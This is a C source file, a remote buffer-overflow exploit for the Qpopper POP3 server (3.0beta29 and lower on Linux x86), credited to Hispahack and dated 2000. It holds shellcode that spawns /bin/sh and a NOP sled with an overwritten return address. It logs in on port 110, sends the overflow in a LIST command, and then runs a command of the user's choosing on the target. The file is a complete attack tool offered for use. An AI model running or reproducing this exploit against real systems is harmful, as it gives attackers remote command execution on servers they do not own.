/*
 * !Hispahack Research Team
 * http://hispahack.ccc.de
 *
 * By Zhodiac <zhodiac@softhome.net>
 *
 * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
 * Overflow at pop_list()->pop_msg()
 *
 *   Tested: (overflowable)
 *
 *           3.0beta28  offset=0
 *           3.0beta26  offset=0
 *           3.0beta25  offset=0
 *
 * Untested: (but overflowable)
 *
 *           3.0beta29
 *           3.0beta28
 *           3.0beta27
 *           3.0beta26
 *           3.0beta25
 *           3.0beta24
 *           3.0beta23
 *           3.0beta22
 *           3.0beta21
 *           3.0beta20
 *           3.0beta19
 *           3.0beta18
 *           3.0beta17
 *           3.0beta16
 *           3.0beta15
 *           3.0beta14
 *           3.0beta13
 *           3.0beta12
 *           3.0beta11
 *           3.0beta10
 *           3.0beta9
 *           3.0beta8
 *           3.0beta7
 *           3.0beta6
 *           3.0beta5
 *           3.0beta4
 *           3.0beta3
 *           3.0beta2
 *           3.0beta1
 *           3.0 *
 *
 * #include <standar/disclaimer.h>
 *
 * This code is dedicated to my love [CrAsH]] and to all the people who
 * were raided in Spain in the last few days.
 *
 * Madrid 10/1/2000
 *
 * missnglnk <missnglnk@tribune.intranova.net>
 * - Allows you to specify the command to execute on the remote host,
 *   and added network support to the program so you do not need netcat
 *   to use this.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BUFFERSIZE 1004
#define NOP 0x90
#define OFFSET 0xbfffd9c4
// #define OFFSET 0x0

char shellcode[]=
  "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
  "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
  "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";


void usage(char *progname)
{
  fprintf(stderr,"Usage: (%s <hostname> <login> <password> <command> [<offset>]\n",progname);
  exit(1);
}

int main(int argc, char **argv)
{
  char *ptr,buffer[BUFFERSIZE],rcvbuf[4096],username[128],password[128],exploit[4096],command[4096];
  unsigned long *long_ptr,offset=OFFSET;
  int aux,sock;
  struct sockaddr_in sin;
  unsigned long ip;
  struct hostent *he;

  fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
  fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n");

  if (argc<5) usage(argv[0]);

  if (argc==6) offset+=atol(argv[5]);

  ptr=buffer;
  memset(ptr,0,sizeof(buffer));
  memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
  ptr+=sizeof(buffer)-strlen(shellcode)-16;
  memcpy(ptr,shellcode,strlen(shellcode));
  ptr+=strlen(shellcode);
  long_ptr=(unsigned long*)ptr;
  for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
  ptr=(char *)long_ptr;
  *ptr='\0';

  fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
  fprintf(stderr,"Offset: 0x%lx\n\n",offset);

  snprintf(username, sizeof(username), "USER %s\n",argv[2]);
  snprintf(password, sizeof(password), "PASS %s\n",argv[3]);
  snprintf(exploit, sizeof(exploit), "LIST 1 %s\n",buffer);
  snprintf(command, sizeof(command), "%s\n", argv[4]);

  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
      perror("socket()");
      return -1;
    }

  if ((he = gethostbyname(argv[1])) != NULL)
    {
      ip = *(unsigned long *)he->h_addr;
    }
  else
    {
      if ((ip = inet_addr(argv[1])) == NULL)
        {
          perror("inet_addr()");
          return -1;
        }
    }

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = ip;
  sin.sin_port = htons(110);

  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
    {
      perror("connect()");
      return -1;
    }

  if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
    {
      perror("read()");
      return -1;
    }

  if (strstr(rcvbuf, "+OK") == NULL)
    {
      printf("Server didnt respond with ok\n");
      rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
      printf("\t%s\n", rcvbuf);
      return -1;
    }

  rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  printf("\t%s\n", rcvbuf);
  bzero(rcvbuf, sizeof(rcvbuf));

  if (write(sock, username, strlen(username)) < strlen(username))
    {
      perror("write()");
      return -1;
    }

  if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
    {
      perror("read()");
      return -1;
    }

  if (strstr(rcvbuf, "+OK") == NULL)
    {
      printf("Server didnt respond with username ok\n");
      rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
      printf("\t%s\n", rcvbuf);
      return -1;
    }

  rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  printf("\t%s\n", rcvbuf);
  bzero(rcvbuf, sizeof(rcvbuf));

  if (write(sock, password, strlen(password)) < strlen(password))
    {
      perror("write()");
      return -1;
    }

  if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
    {
      perror("read()");
      return -1;
    }

  if (strstr(rcvbuf, "+OK") == NULL)
    {
      printf("Server didnt respond with password ok\n");
      rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
      printf("\t%s\n", rcvbuf);
      return -1;
    }

  rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  printf("\t%s\n", rcvbuf);
  bzero(rcvbuf, sizeof(rcvbuf));

  if (write(sock, exploit, strlen(exploit)) < strlen(exploit))
    {
      perror("write()");
      return -1;
    }

  if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
    {
      perror("read()");
      return -1;
    }

  rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  printf("\t%s\n", rcvbuf);
  bzero(rcvbuf, sizeof(rcvbuf));

  if (write(sock, command, strlen(command)) < strlen(command))
    {
      perror("write()");
      return -1;
    }

  if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
    {
      perror("read()");
      return -1;
    }

  rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
  printf("\t%s\n", rcvbuf);
  bzero(rcvbuf, sizeof(rcvbuf));

  if (close(sock) < 0)
    {
      perror("close()");
      return -1;
    }

  return(0);
}
/*                    www.hack.co.za                  [29 Feb 2000]*/